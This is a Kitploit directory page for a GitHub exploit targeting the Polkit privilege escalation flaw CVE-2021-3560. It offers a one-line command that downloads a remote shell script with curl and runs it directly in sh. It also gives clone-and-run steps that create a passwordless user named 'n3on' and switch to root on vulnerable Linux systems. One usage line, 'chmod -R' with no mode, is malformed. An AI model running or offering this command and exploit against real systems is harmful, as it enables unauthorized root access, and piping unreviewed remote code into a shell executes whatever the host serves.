Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2021-3560 — One-command Polkit privilege escalation exploit for CVE-2021-3560, creating a passwordless user and switching to root on vulnerable Linux systems. | Kitploit
Tools/GitHubGitHub/neonwhiterabbit/cve-2021-3560
Privilege EscalationVulnerability AnalysisExploitationPenetration TestingRed Teaming
GitHubneonwhiterabbit/cve-2021-3560

CVE-2021-3560

One-command Polkit privilege escalation exploit for CVE-2021-3560, creating a passwordless user and switching to root on vulnerable Linux systems.

View Repository
314 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2021-3560

Polkit Instant Root Exploit

You can run one command to root with Polkit CVE-2021-3560 vulnerable boxes by typing in:

sh -c "$(curl -sSL https://raw.githubusercontent.com/n3onhacks/CVE-2021-3560/main/polkit.sh)"

Or you can download the .sh or copy and paste it. Run and Instant Root. User created is named 'n3on' with no password, script then switches to root.

Usage:

>git clone https://github.com/n3onhacks/CVE-2021-3560.git
>chmod -R CVE-2021-3560
>cd CVE-2021-3560
>./polkit.sh

*If you are not automatically root, type in 'sudo -s' to be root (See video).

POC Video:

https://www.youtube.com/watch?v=UWfuoeTeTtU

Download Tool